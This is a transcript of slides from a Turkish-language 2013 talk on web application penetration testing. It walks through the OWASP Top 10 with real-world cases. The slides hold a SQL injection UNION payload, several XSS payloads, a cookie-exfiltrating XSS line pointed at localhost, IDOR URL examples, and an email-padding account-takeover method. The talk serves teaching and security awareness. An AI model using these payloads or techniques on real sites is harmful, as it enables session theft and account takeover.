Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Ozgur web teknolojileri'13

2,510 views

Published on

Özgür web teknolojileri günleri 2013 sunumum.

  • Be the first to comment

Ozgur web teknolojileri'13

  1. 1. Web Uygulama Sızma Testi Özgür Web Teknolojileri Günleri ‘13
  2. 2. root@intelrad:~$ whoami Mehmet Dursun İNCE Pentest Lead at IntelRAD Zafiyet Araştırmacısı White Hat Hacker Linux & OpenSource PHP, Python
  3. 3. İÇERİK 1. 2. 3. 4. Saldırı nasıl gerçekleşir ? Yaşanmış örnekler ile Uygulama Zafiyetleri Veri tabanı davranışları Son
  4. 4. İNPUT
  5. 5. OWASP 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Injection Broken Authentication and Session Management Cross-Site Scripting (XSS) Insecure Direct Object References Security Misconfiguration Sensitive Data Exposure Missing Function Level Access Control Cross-Site Request Forgery (CSRF) Using Components with Known Vulnerabilities Unvalidated Redirects and Forwards
  6. 6. HTTP PROXY
  7. 7. INJECTION
  8. 8. Sql Injection Gerçek Hayattan Örnek http://sea.ebay.com/list.php?catid=36
  9. 9. Sql Injection Gerçek Hayattan Örnek
  10. 10. Sql Injection Gerçek Hayattan Örnek HTTP requestleri kullanıcılar tarafından manipüle edilebildiğine göre; checkbox[]=2 #SELECT title,content FROM foo WHERE id = 2 Yerine checkbox[]=5 LIMIT 1,1 UNION ALL SELECT version() #SELECT title, content FROM foo WHERE id = 5 LIMIT 1,1 UNION SELECT version(),2
  11. 11. Sql Injection Gerçek Hayattan Örnek Tablo isimleri; phpcms_admin phpcms_admin_role phpcms_admin_role_priv phpcms_ads …
  12. 12. SQLI UYGULAMA
  13. 13. HASHCAT 25 GPU 348 Milyar/sn
  14. 14. XSS Nedir ? www.site.com/search/?keyword=Mehmet
  15. 15. XSS Nedir ? www.site.com/search/?keyword=<script>alert(/XSS/)</script>
  16. 16. XSS Gerçek Hayattan Örnek - 1 1. 2. 3. 4. From : <img src=# onerror=alert(document.cookie)>@blabla.com To: victim@gmail.com victim@gmail.com sahibi mail.google.com adresine girer Fixed : 08.08.2013
  17. 17. XSS Gerçek Hayattan Örnek - 2 1. Dropbox üzerinde '"><img src=# onerror=alert(document.domain)>.txt 2. 3. Peki Linux üzerinde touch komutu ile bu isimde dosya oluşturulursa ? Facebook gruplarında Dropbox üzerinden dosya paylaşımı yapılabilmektedir. 4. Peki ya sonra...
  18. 18. XSS Gerçek Hayattan Örnek - 2 Sonuç: Grup üyeleri olan tüm kullanıcıların tarayıcılarında javascript kodu çalıştırabilme yetkisi.
  19. 19. XSS UYGULAMA <script>document.location="//localhost/?ke=" +document.cookie</script>
  20. 20. Google Reflected XSS - 2 gün önce!
  21. 21. Google Reflected XSS - 2 gün önce!
  22. 22. XSS Gerçek Hayattan Örnek - 3 http://www.xyz.com/news/throw-pepper-sprey/#!prettyPhoto[gallery2]/0/
  23. 23. XSS Gerçek Hayattan Örnek - 3 http://www.xyz.com/news/throw-pepper-sprey/#!prettyPhoto[gallery2]/”>svg onload=alert(document.cookie)/
  24. 24. XSS Gerçek Hayattan Örnek - 3 prettyPhoto javascript library’si analiz edildiğinde; NOT: Jquery 1.9.1 öncesi versiyonları etkileyen jQuery zafiyeti. Framework’e -çok- güvenmek.
  25. 25. XSS Gerçek Hayattan Örnek - 3 3th party yazılımı kullanan projeler; 107 adet projede XSS zafiyeti mevcut.
  26. 26. Xml eXternal Entity Nedir ?
  27. 27. Gerçek Hayattan XXE Örneği
  28. 28. XXE UYGULAMA
  29. 29. Yetki Hataları www.test.com/fatura/aylik/1337 www.test.com/fatura/aylik/1338
  30. 30. Gerçek Hayattan Yetki Hataları https://ap.nokia.com/APPortalExt/mycompany/requests.aspx?id=26033
  31. 31. Gerçek Hayattan Yetki Hataları https://ap.nokia.com/APPortalExt/mycompany/requests.aspx?id=26029
  32. 32. Veritabanı
  33. 33. Veritabanı
  34. 34. Veritabanı
  35. 35. Veritabanı
  36. 36. Veritabanı
  37. 37. Gerçek Hayattan Örnek
  38. 38. Gerçek Hayattan Örnek Sonuç TRUE döner.
  39. 39. Gerçek Hayattan Örnek 1. email VARCHAR (100); 2. Hacker sisteme aşağıdaki mail adresi ile üye olur ‘admin@abc.com 100 adet boşluk AAAAAA’ 3. checkEmailAdresi methodu TRUE döner. 4. Hacker yazılım üzerinde kendi şifresini değiştirir. 5. Yazılım şifre güncellemesini user id yerine email adresine göre yapar. 6. Administratorun ve hacker’ın şifresi updatelenir.
  40. 40. ÖNERİLER ● Web Programlama Dili ● Exploit-db.com ● E-Kitaplar; Kali ve Linux’e Giriş [Turkish] Web Application Security #101 [Turkish] Source Code Analysis at Web Applications - I [Turkish] Source Code Analysis at Web Applications - II Web Application Hacker's Handbook
  41. 41. Teşekkürler Mehmet Dursun INCE mehmet.ince@intelrad.com twitter.com/mmetince Teşekkürler : 1. Roy Castillo 2. Detectify 3. Vinesh Redkat 4. mkyong.com 5. Oren Hafif

×